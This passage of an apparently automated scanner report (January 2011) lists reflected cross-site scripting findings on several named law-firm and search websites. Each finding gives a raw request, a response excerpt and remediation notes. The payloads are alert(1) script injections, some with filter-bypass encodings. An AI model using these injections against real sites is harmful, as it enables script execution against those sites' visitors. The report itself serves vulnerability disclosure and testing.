Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?ETITLE=Washington, D.C.94895"><script>alert(1)</script>288abb3048&FUSEACTION=correspondence.emailform&SITE_ID=299&pf=y">
...[SNIP]...

4.98. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</h2>
                                   
           I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br>
...[SNIP]...

4.99. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.site145fe"><script>alert(1)</script>aed5c335ef1&SITE_ID=299&pf=y">
...[SNIP]...

4.100. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FED44"><SCRIPT>ALERT(1)</SCRIPT>C707A822C6A=1&FUSEACTION=news.site&SITE_ID=299&pf=y">
...[SNIP]...

4.101. http://www.fulbright.com/index.cfm [pf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=home.299&PF=y660d3"><script>alert(1)</script>39aa8a72e69&pf=y">
...[SNIP]...

4.102. http://www.fulbright.com/index.cfm [rss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/
Content-Type: text/xml

<html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


        -
       


...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.allrss&RSS=y1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731&SITE_ID=286&pf=y">
...[SNIP]...

4.103. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Wed, 19 Jan 2011 16:48:16 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455696+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:56:12 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39615

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a>
...[SNIP]...

4.104. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kqd4kregj1lis3uz4nrgoa55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]>
...[SNIP]...

4.105. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learnestateplanning.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1
Host: www.learnestateplanning.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 19 Jan 2011 16:52:08 GMT
Content-type: text/html
Connection: close

<html><head><title>LEARNESTATEPLANNING.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://sites.google.com/a/mayberrylawfirm.com/learnestateplanning/?faa91"><script>alert(1)</script>3a8a42ea6f9=1" name="LEARNESTATEPLANNING.COM">
...[SNIP]...

4.106. http://www.local.com/results.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 140321
Date: Wed, 19 Jan 2011 16:55:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=2kp5nz3tik1sq1fna4qmow45; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=dc362bce-4849-438a-bd9e-20b0269c8fd9&expdate=634336161100159854&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(1))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:10 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&exp=634310259100159854; domain=local.com; expires=Wed, 19-Jan-2011 17:25:10 GMT; path=/
Content-Length: 140321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22b7005"style="x:expression(alert(1))"e433a090613&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.107. http://www.local.com/results.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138997
Date: Wed, 19 Jan 2011 16:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=j2ua4c45yad2fi450tpoco55; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22abc1a";bdb542a73ab&loc=Dallas%2c+TX&kw=law+offices&uid=ee28739b-dce3-4ad1-af39-ce25887ac7db&expdate=634336161121623015&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22abc1a%22%253bbdb542a73ab&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:12 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22abc1a";bdb542a73ab&exp=634310259121623015; domain=local.com; expires=Wed, 19-Jan-2011 17:25:12 GMT; path=/
Content-Length: 138997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
offices";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "2531/x22abc1a";bdb542a73ab";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Attorneys & Lawyers: General Practice";
s.eVa
...[SNIP]...

4.108. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138662
Date: Wed, 19 Jan 2011 16:56:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=blu1lc45gh00cti30geojtrb; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=b78384a3-ca52-4529-b52d-d9bd5fffc842&expdate=634336161669772654&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22%26dbb72%22style%253d%22x%253aexpression(alert(1))%224ccefb20720%3d1&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:56:06 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310259669772654; domain=local.com; expires=Wed, 19-Jan-2011 17:26:06 GMT; path=/
Content-Length: 138662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.109. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mckennacuneo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1
Host: www.mckennacuneo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:37 GMT
Server: Apache/2.2.15 (FreeBSD)
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15847

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html;
...[SNIP]...
<a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'>
...[SNIP]...

4.110. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
